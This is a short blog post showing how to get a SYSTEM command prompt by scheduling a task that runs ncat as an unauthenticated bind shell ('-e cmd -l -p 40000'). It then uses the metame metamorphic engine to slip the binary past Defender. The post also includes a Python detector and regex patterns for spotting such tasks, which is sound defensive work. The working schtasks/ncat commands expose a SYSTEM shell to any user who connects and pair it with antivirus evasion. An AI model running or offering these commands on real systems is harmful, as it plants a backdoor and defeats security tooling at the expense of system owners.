Command prompt with System rights using Schtasks, Ncat and Metame

Mark Mo
2 min read · Sep 4, 2019


This is nothing new, but it might be new to someone. Sometimes I just want to run a command prompt as SYSTEM. There is always “psexec -i -s cmd” from Sysinternals, but I always like to know how to do things multiple ways. This is just another way.

I’m scheduling a task as admin. At first, I just used the standalone ncat.exe from nmap.org. I got it here:

http://nmap.org/dist/ncat-portable-5.59BETA1.zip

I schedule a task to run as SYSTEM. I must be running the command prompt as admin to do this. The key is that I’m specifying the user as “SYSTEM” with “/RU SYSTEM”; no password is required. I am already running the command prompt at admin level, but not with system rights… YET 😊

Schtasks /create /RU SYSTEM /SC weekly /D SAT /TN IAmRoot /TR "C:\temp\ncat.exe -e cmd -l -p 40000" /ST 10:00:00
Schtasks /run /TN IAmRoot

When I connected to it using the command “ncat 10.10.10.196 40000”, it initially worked. However, a few minutes later Defender came along and stomped on the exe, as you can see in my screenshot.

Not to be outdone, I ran ncat.exe through metame. According to the GitHub repo (https://github.com/a0rtega/metame), “metame is a simple metamorphic code engine for arbitrary executables.”

I copied over the rebuilt executable and rescheduled it and ran it.

Schtasks /create /RU SYSTEM /SC weekly /D SAT /TN IAmRoot /TR "C:\temp\morphedncat -e cmd -l -p 40000" /ST 10:00:00
Schtasks /run /TN IAmRoot

In the second window I’m starting off as Joe User with no admin rights. I connect to the morphed version of netcat and then I’m running with SYSTEM rights. So far Defender hasn’t complained, but it is always cat and mouse.
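The flip side of the trick above is what a defender should look for: the task runs as SYSTEM, its action is a binary in a user-writable directory, and its arguments are a listener that hands a cmd shell to whoever connects to the port, with no authentication (which is exactly why the non-admin "Joe User" ends up with SYSTEM rights). The script below is an added example, not code from the post or from the ncat or metame projects. It reads the CSV form of `schtasks /query /fo CSV /v` and flags SYSTEM tasks that show those traits. The sample rows, host names, task names and user names are constructed, and the sample keeps only a subset of the columns the real verbose output has; the column names it relies on ("TaskName", "Author", "Task To Run", "Run As User") are the ones schtasks emits.

```python
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo CSV /v` output, reduced to the
# handful of columns this check reads (the real verbose output carries many more).
# Hosts, users and task names are made up; rows 1 and 4 mimic the pattern described in
# the post (a SYSTEM task whose action is a listener that spawns cmd).
SAMPLE_SCHTASKS_CSV = """\
"HostName","TaskName","Author","Task To Run","Run As User","Schedule Type"
"WS01","\\IAmRoot","WS01\\jdoe","C:\\temp\\ncat.exe -e cmd -l -p 40000","SYSTEM","Weekly"
"WS01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Microsoft Corporation","%windir%\\system32\\defrag.exe -c -h -o -$","SYSTEM","Weekly"
"WS01","\\Backup","WS01\\jdoe","C:\\Users\\jdoe\\backup.bat","WS01\\jdoe","Daily"
"WS01","\\Updater","WS01\\jdoe","C:\\ProgramData\\upd\\morphedncat -e cmd -l -p 40000","NT AUTHORITY\\SYSTEM","Weekly"
"""

# Principals that mean "runs as LocalSystem" in schtasks output (compared upper-cased).
SYSTEM_ACCOUNTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "S-1-5-18"}

# Action binaries launched from locations a non-admin user can normally write to.
WRITABLE_PATH_RE = re.compile(
    r'^"?(?:[a-z]:\\(?:temp|users|programdata|windows\\temp)\\'
    r'|%(?:temp|tmp|appdata|localappdata|public)%)',
    re.IGNORECASE,
)

# Argument shapes typical of a netcat-style listener that hands out a shell.
LISTENER_RE = re.compile(
    r"(?:^|\s)-e\s+(?:cmd|powershell)(?:\.exe)?\b"   # -e cmd / -e powershell
    r"|(?:^|\s)-l\b.*(?:^|\s)-p\s+\d+"                # -l ... -p <port>
    r"|(?:^|\s)-lvp\s*\d+",                           # -lvp <port>
    re.IGNORECASE,
)


def parse_schtasks_csv(text):
    """Parse schtasks CSV text into one dict per task, keyed by the header names."""
    return list(csv.DictReader(io.StringIO(text)))


def classify_task(row):
    """Return the reasons a SYSTEM task looks suspicious; an empty list means no finding."""
    run_as = row.get("Run As User", "").strip().upper()
    action = row.get("Task To Run", "").strip()
    author = row.get("Author", "").strip()
    if run_as not in SYSTEM_ACCOUNTS:
        return []  # this check only cares about tasks that run with SYSTEM rights
    reasons = []
    if WRITABLE_PATH_RE.search(action):
        reasons.append("action binary lives in a user-writable location")
    if LISTENER_RE.search(action):
        reasons.append("action arguments look like a listener that spawns a shell")
    # Author is context for the analyst, not a trigger on its own: plenty of
    # legitimate third-party software registers SYSTEM tasks.
    if reasons and not author.lower().startswith("microsoft"):
        reasons.append(f"registered by a non-Microsoft author: {author}")
    return reasons


def find_suspicious_tasks(text):
    """Return (task name, reasons) for every SYSTEM task in the CSV that trips a check."""
    findings = []
    for row in parse_schtasks_csv(text):
        reasons = classify_task(row)
        if reasons:
            findings.append((row["TaskName"], reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in find_suspicious_tasks(SAMPLE_SCHTASKS_CSV):
        print(name)
        for reason in reasons:
            print("  -", reason)
```

Run against the constructed sample, the two listener tasks are reported and the built-in defrag task (SYSTEM, but a Microsoft task under %windir%) is not. The same checks apply to the task XML carried in Security event 4698 ("A scheduled task was created"), which is the place to catch the creation at the time it happens rather than on a later sweep; the Run As principal, the action path and the arguments are all present there too.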

Anyway, I hope that is helpful to someone else. Feel free to follow me on Twitter (@_markmo_) https://twitter.com/_markmo_

Mark Mo

@fashionproof.bsky.social on bluesky @_markmo_ on twitter